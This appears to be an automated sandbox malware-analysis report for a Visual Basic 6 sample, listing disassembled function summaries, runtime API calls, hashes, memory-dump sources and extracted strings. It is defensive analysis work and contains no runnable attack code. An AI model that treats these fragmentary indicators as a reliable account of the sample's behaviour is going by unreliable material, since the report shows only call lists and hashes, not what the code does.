                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Destruct$Free$Move$Copy$#698#712AssignErrorListOverflowUbound
                                                          • String ID: &
                                                          • API String ID: 3078955159-1010288
                                                          • Opcode ID: 27a65ceba443ac56885d1e360dad413f939df5f43b2a35e08b0e7aebde89fb86
                                                          • Instruction ID: b1479b74565a89c3dfe799059aee65bb52b9dea95223e59b27ede90fd81375a3
                                                          • Opcode Fuzzy Hash: 27a65ceba443ac56885d1e360dad413f939df5f43b2a35e08b0e7aebde89fb86
                                                          • Instruction Fuzzy Hash: 5F31F971801258AFDB11CBA0DE88BEEBBB8BB48300F14819EE14AB7151D7751A88CF65
                                                          APIs
                                                          • #631.MSVBVM60(?,004030D6,?,6D42D8B1,6D42D83C,00000000), ref: 0043AF98
                                                          • __vbaStrMove.MSVBVM60(?,00000000,00000002), ref: 0043AFA3
                                                          • __vbaFreeVar.MSVBVM60(?,00000000,00000002), ref: 0043AFAC
                                                          • __vbaStrCmp.MSVBVM60(00407034,?), ref: 0043AFC8
                                                          • #561.MSVBVM60(00004008), ref: 0043AFD9
                                                          • __vbaFreeStr.MSVBVM60(0043B013,6D42D8B1,6D42D83C,00000000), ref: 0043B00C
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0043B029
                                                          Strings
                                                          • SpPNKQwBzuVGaGhvnlwxFaZxbOUrNHuL, xrefs: 0043B4C2
                                                          • IP:, xrefs: 0043B2D2
                                                          • 18243A3B6B586D091D3930083746180B18, xrefs: 0043B481
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$#561#631ErrorMoveOverflow
                                                          • String ID: 18243A3B6B586D091D3930083746180B18$IP:$SpPNKQwBzuVGaGhvnlwxFaZxbOUrNHuL
                                                          • API String ID: 3197503391-3402312904
                                                          • Opcode ID: 689539cc900c512ed7c2de4426b804dbe95cca75c3d5b85bfcbf4413a336c79d
                                                          • Instruction ID: a8be2a08f34082ea70e346f325686bb2978981354e8d8ee772627e2965dd18b0
                                                          • Opcode Fuzzy Hash: 689539cc900c512ed7c2de4426b804dbe95cca75c3d5b85bfcbf4413a336c79d
                                                          • Instruction Fuzzy Hash: 6E211075D00209AFCB14DFB8D945AEEBBB4EB0C741F10522AE516F72A0E7745904CFA5
                                                          APIs
                                                          • __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00000000), ref: 00433ED1
                                                          • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00433EE4
                                                          • __vbaVarDup.MSVBVM60(?,00000000), ref: 00433F08
                                                          • #607.MSVBVM60(?,-00000001,?,?,00000000), ref: 00433F22
                                                          • __vbaStrVarMove.MSVBVM60(?,?,00000000), ref: 00433F2C
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 00433F37
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,00000000), ref: 00433F47
                                                          • #644.MSVBVM60(?), ref: 00433F54
                                                          • __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00433F6C
                                                          • __vbaFreeStr.MSVBVM60(00433FA6,?,000000FF,00000000,00000000), ref: 00433F9F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$ErrorFreeMoveSystem$#607#644CopyList
                                                          • String ID:
                                                          • API String ID: 3415219340-0
                                                          • Opcode ID: ff8d7aa729cfb73c50c8c0a12e9c749eb98539d600895a4b8492013cccc7201d
                                                          • Instruction ID: 2ebdc42460f10a7874e9a21e244da2870e744d7b21d4e5efd8afa7d33b599f9e
                                                          • Opcode Fuzzy Hash: ff8d7aa729cfb73c50c8c0a12e9c749eb98539d600895a4b8492013cccc7201d
                                                          • Instruction Fuzzy Hash: 91318071D01149AFCB00EFA5DE49DAEBBB9EF84701F10812AF501B62A4DB785A05CF99
                                                          APIs
                                                          • #685.MSVBVM60 ref: 0042AF1A
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042AF25
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A9C4,0000002C), ref: 0042AF46
                                                          • #595.MSVBVM60(00000008,00000000,?,?,?), ref: 0042AF78
                                                          • __vbaFreeObj.MSVBVM60 ref: 0042AF81
                                                          • __vbaFreeVarList.MSVBVM60(00000004,00000008,?,?,?), ref: 0042AF9F
                                                          • __vbaExitProc.MSVBVM60 ref: 0042AFA8
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042B021), ref: 0042B016
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042B01E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$DestructFree$#595#685CheckExitHresultListProc
                                                          • String ID:
                                                          • API String ID: 130669328-0
                                                          • Opcode ID: 156c952465e4d8b0f93466572d7744051335726478247a17c838d61c3390b769
                                                          • Instruction ID: 397696dcb7632f02b1bb0dc7fefe57b8feffa857172323e087aa0fe2694031d1
                                                          • Opcode Fuzzy Hash: 156c952465e4d8b0f93466572d7744051335726478247a17c838d61c3390b769
                                                          • Instruction Fuzzy Hash: FE21F8B1D00218DFEB14DBA4DD48FDE7BB8EB48300F10816AF659E7151DA745A48CF64
                                                          APIs
                                                          • __vbaLenBstr.MSVBVM60(00000000,?,004030D6,00000001), ref: 0043B06D
                                                          • #631.MSVBVM60(?,?,?), ref: 0043B094
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 0043B09F
                                                          • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0043B0A8
                                                          • __vbaStrCmp.MSVBVM60(00407034,?,?,?,?), ref: 0043B0C4
                                                          • #561.MSVBVM60(00004008,?,?,?), ref: 0043B0D5
                                                          • __vbaFreeStr.MSVBVM60(0043B111), ref: 0043B10A
                                                          • __vbaErrorOverflow.MSVBVM60(?,?,?), ref: 0043B127
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$#561#631BstrErrorMoveOverflow
                                                          • String ID:
                                                          • API String ID: 1526774655-0
                                                          • Opcode ID: e9c63996d72be22e29baa3bd0852e1fc6ddce946803e866fefab9b9c7cd9d20d
                                                          • Instruction ID: 49de610ef46cc87c39e2099232fe8ef023a28c0e3241c1bbc0b3ba17b73fdb39
                                                          • Opcode Fuzzy Hash: e9c63996d72be22e29baa3bd0852e1fc6ddce946803e866fefab9b9c7cd9d20d
                                                          • Instruction Fuzzy Hash: 3F212AB1E00219EFCB00DFA4D989BAEBBB4FB08741F10512AE505F7260E7746945CBA5
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,00412AFF,?,0043D038), ref: 0043281E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0043284E
                                                          • #648.MSVBVM60(0000000A), ref: 00432874
                                                          • __vbaFreeVar.MSVBVM60 ref: 00432881
                                                          • __vbaFileOpen.MSVBVM60(00000220,000000FF,?), ref: 004328A0
                                                          • __vbaPut3.MSVBVM60(00000000,00000000,?), ref: 004328B8
                                                          • __vbaFileClose.MSVBVM60(?), ref: 004328CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$File$#648ChkstkCloseErrorFreeOpenPut3
                                                          • String ID:
                                                          • API String ID: 509661398-0
                                                          • Opcode ID: 0ef7475797edf30ec01317cc771f0a3234e0fecae57e340572436e90524f820d
                                                          • Instruction ID: aecf047652c9d7d6c4f3f8575439f32e195252a2907ea1a220e6fd4eeabd1e1f
                                                          • Opcode Fuzzy Hash: 0ef7475797edf30ec01317cc771f0a3234e0fecae57e340572436e90524f820d
                                                          • Instruction Fuzzy Hash: 84210AB4901248EBDB00DFD4DA09BDEBBB8FF08714F208159F515B7690C7B95A44CBA9
                                                          APIs
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 00427C49
                                                          • __vbaExitProc.MSVBVM60 ref: 00427C4F
                                                          • __vbaFreeVar.MSVBVM60(00427CC7), ref: 00427C9F
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427CB4
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427CBC
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427CC4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Destruct$ExitFreeMoveProc
                                                          • String ID:
                                                          • API String ID: 3024875322-0
                                                          • Opcode ID: 252ffab35d565f820a062c643350cd3d5e223aef7f8e375f11f824fd0d362014
                                                          • Instruction ID: 0ee9ab54d7ed96c0eea76a83d3e41d5fd249ecba7a2cadf0a397b155064e65d1
                                                          • Opcode Fuzzy Hash: 252ffab35d565f820a062c643350cd3d5e223aef7f8e375f11f824fd0d362014
                                                          • Instruction Fuzzy Hash: A7E0ED72D04158EFEB04DBA0ED55FED7778EB88711F00816AE606764A4DA706A88CF78
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$ExitProc
                                                          • String ID:
                                                          • API String ID: 3697045878-0
                                                          • Opcode ID: 813cebabebae72e028ed965fd31929d952929a793ccb0686672562710b9bf161
                                                          • Instruction ID: 0de887b1f7609e67ed996d3fff853562c1a2b3736520d75970bf56b718fcbdc1
                                                          • Opcode Fuzzy Hash: 813cebabebae72e028ed965fd31929d952929a793ccb0686672562710b9bf161
                                                          • Instruction Fuzzy Hash: 23E04CB2C1412C9ACB04DFA0FD55ADC7B74EF58301F105066D813721A49F742F49CE95
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004262A1
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004262BE
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426303
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426320
                                                          • __vbaVarCopy.MSVBVM60 ref: 00426344
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042638A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004263A7
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 004263CC
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426400
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042641D
                                                          • __vbaVarCopy.MSVBVM60 ref: 00426441
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 00426462
                                                          • __vbaRedim.MSVBVM60(00000880,00000010,00000000,0000000C,00000001,00000000), ref: 00426478
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042648E
                                                          • __vbaI2I4.MSVBVM60 ref: 0042649F
                                                          • __vbaVarCopy.MSVBVM60 ref: 004265C6
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00426E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$BoundsGenerate$CopyUbound$OverflowRedim
                                                          • String ID: -
                                                          • API String ID: 2033917355-2547889144
                                                          • Opcode ID: 4f804a14538f997de2660caca1c829d0c71d3d512e1e3cd9b4ae0a585c8aee2d
                                                          • Instruction ID: 20ab15c86b360cd977ac607f42421b447cf8fa97bcca3867b883a7f3821cc118
                                                          • Opcode Fuzzy Hash: 4f804a14538f997de2660caca1c829d0c71d3d512e1e3cd9b4ae0a585c8aee2d
                                                          • Instruction Fuzzy Hash: F251C274A00169CBDB24DF94E688BEDBBB1BF54304F6141CAC4456B254C7B8AEC6CF49
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004260F7
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426114
                                                          • __vbaChkstk.MSVBVM60 ref: 00426125
                                                          • __vbaChkstk.MSVBVM60 ref: 00426160
                                                          • __vbaVarIndexStore.MSVBVM60(?,00000001), ref: 00426183
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 004261A5
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 004261B3
                                                          • __vbaUbound.MSVBVM60(00000001,00000000,00000000), ref: 004261D7
                                                          • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,00000000), ref: 004261F6
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 0042620C
                                                          • __vbaI2I4.MSVBVM60 ref: 0042621D
                                                          • __vbaVarCopy.MSVBVM60 ref: 00426344
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00426E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Ubound$Error$BoundsChkstkGenerate$CopyIndexOverflowRedimStore
                                                          • String ID: &
                                                          • API String ID: 4100852208-1010288
                                                          • Opcode ID: 337ef997032cfd7041f7c0e566d2042d6524589b80a5b7c29f582d1988f1cdba
                                                          • Instruction ID: 87c31adde373bf2eb6dc2749c0cfd04140a65a80a58a4b24b1e3a7c7cba363c8
                                                          • Opcode Fuzzy Hash: 337ef997032cfd7041f7c0e566d2042d6524589b80a5b7c29f582d1988f1cdba
                                                          • Instruction Fuzzy Hash: BC31DFB4A012288FCB14CF48D984BA9BBB1BF48304F64C19AD409AB355D775AA82CF85
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60(?,?,00000000), ref: 0042B07F
                                                            • Part of subcall function 0042EA80: __vbaLenBstr.MSVBVM60(00000000,00402700,00000000,6D42D8B1), ref: 0042EAC9
                                                            • Part of subcall function 0042EA80: __vbaLenBstr.MSVBVM60 ref: 0042EAD7
                                                            • Part of subcall function 0042EA80: __vbaFpI4.MSVBVM60 ref: 0042EB11
                                                            • Part of subcall function 0042EA80: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0042EB31
                                                            • Part of subcall function 0042EA80: __vbaUbound.MSVBVM60(00000001,?), ref: 0042EB40
                                                            • Part of subcall function 0042EA80: __vbaGenerateBoundsError.MSVBVM60 ref: 0042EB80
                                                            • Part of subcall function 0042EA80: #631.MSVBVM60(?,?,?,0040A4B0), ref: 0042EBB4
                                                            • Part of subcall function 0042EA80: __vbaStrMove.MSVBVM60 ref: 0042EBBF
                                                            • Part of subcall function 0042EA80: __vbaStrCat.MSVBVM60(00000000), ref: 0042EBC2
                                                            • Part of subcall function 0042EA80: __vbaStrMove.MSVBVM60 ref: 0042EBCD
                                                          • __vbaAryMove.MSVBVM60(?,?,?), ref: 0042B099
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042B0A2
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042B0D8), ref: 0042B0D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Bstr$#631BoundsCopyDestructErrorFreeGenerateRedimUbound
                                                          • String ID: 00000001
                                                          • API String ID: 444737788-3071262101
                                                          • Opcode ID: 285cedaddd74574f3a58ee860496415716971eab8fc3649ecc90fad2a7758ff5
                                                          • Instruction ID: b521214db3690c65d6e73f21a32fd0286170701ca874de809ca4144618c1f7ef
                                                          • Opcode Fuzzy Hash: 285cedaddd74574f3a58ee860496415716971eab8fc3649ecc90fad2a7758ff5
                                                          • Instruction Fuzzy Hash: 23011EB0D002199FCF00EFA5D949ADEBBB8FB08700F50852AE505B2190E7786546CBA5
                                                          APIs
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042F969
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0042F989
                                                          • __vbaFreeObj.MSVBVM60 ref: 0042F995
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042F99E
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042F9AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$Destruct$List
                                                          • String ID:
                                                          • API String ID: 2788043521-0
                                                          • Opcode ID: 774e740d36e89ab1da7056e326464c1258f523eb7dad053f830689987274bec1
                                                          • Instruction ID: 9dfc4d001579ba4a57e8dca356d7c2928ede549cb238f806da69a51d0d2dad2c
                                                          • Opcode Fuzzy Hash: 774e740d36e89ab1da7056e326464c1258f523eb7dad053f830689987274bec1
                                                          • Instruction Fuzzy Hash: A1F0A972900109EFEF05DBD0DE49EEE7779FB44705F444129F202B60A0EA706649CB64
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004266B6
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004266D3
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426725
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426742
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426794
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004267B1
                                                          • __vbaVarXor.MSVBVM60(?,?,?), ref: 004267DB
                                                          • __vbaVarMove.MSVBVM60 ref: 004267EF
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 00426810
                                                          • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001), ref: 0042682F
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 00426845
                                                          • __vbaI2I4.MSVBVM60 ref: 00426856
                                                          • __vbaChkstk.MSVBVM60(?), ref: 0042693C
                                                          • __vbaVarIndexLoad.MSVBVM60(?,?,00000001,?), ref: 00426970
                                                          • __vbaVarSub.MSVBVM60(?,00000000), ref: 00426981
                                                          • __vbaVarTstLt.MSVBVM60(00008002,00000000), ref: 0042698F
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042699F
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00426E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$BoundsGenerate$Ubound$ChkstkFreeIndexLoadMoveOverflowRedim
                                                          • String ID: 6
                                                          • API String ID: 2508272159-498629140
                                                          • Opcode ID: dcda7f6a1a6aa45c44efed5217cbafc42648c99ca9e7325fcabdf1f98469febf
                                                          • Instruction ID: bceabd354795514b790df7ea1cf86fc7ddd232b0925b039fa9110f537f0fbbc2
                                                          • Opcode Fuzzy Hash: dcda7f6a1a6aa45c44efed5217cbafc42648c99ca9e7325fcabdf1f98469febf
                                                          • Instruction Fuzzy Hash: C141E574E04129CBCB28CF54E988BEDB7B2BF94304F61819AD4456B254D778ADC2CF49
                                                          APIs
                                                          • __vbaFreeStr.MSVBVM60 ref: 00415371
                                                          • __vbaFreeStrList.MSVBVM60(00000013,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004153C8
                                                          • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 004153EF
                                                          • __vbaFreeVar.MSVBVM60 ref: 004153FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free__vba$List
                                                          • String ID:
                                                          • API String ID: 2192533141-0
                                                          • Opcode ID: 0ef93480439c3593adf187f01e57955a02c23cb497b7f8bf33bb63a66e2c942f
                                                          • Instruction ID: bf5a0212a107e6c496120b953605b6a79c55cb9775ada44c13d9f09bd637cec7
                                                          • Opcode Fuzzy Hash: 0ef93480439c3593adf187f01e57955a02c23cb497b7f8bf33bb63a66e2c942f
                                                          • Instruction Fuzzy Hash: F12186B780011CAADF1ACBD4CD94EEEB77DBB98700F04825EE217A6455EA706749CF60
                                                          APIs
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041B048
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 0041B055
                                                          • __vbaFreeStrList.MSVBVM60(0000000D,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B0B8
                                                          • __vbaFreeVarList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?), ref: 0041B102
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$List$Unlock
                                                          • String ID:
                                                          • API String ID: 3250417665-0
                                                          • Opcode ID: 2c8c26e3a8ae196fa61de17f3fdfe0a1696d4ea664124d68dd1f283861ee7ff6
                                                          • Instruction ID: 7e61b8e8675a8c6171d39224ebb3579cd1b66b99f03ff23f460821e829af9c6d
                                                          • Opcode Fuzzy Hash: 2c8c26e3a8ae196fa61de17f3fdfe0a1696d4ea664124d68dd1f283861ee7ff6
                                                          • Instruction Fuzzy Hash: 5E21927781012CABDB6ACB80CD94FDAB37DAB48700F0445DAA61A66450EA706BC8CF60
                                                          APIs
                                                          • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042DD05
                                                          • __vbaFreeObj.MSVBVM60 ref: 0042DD11
                                                          • __vbaFreeVarList.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?), ref: 0042DD59
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042DD6B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
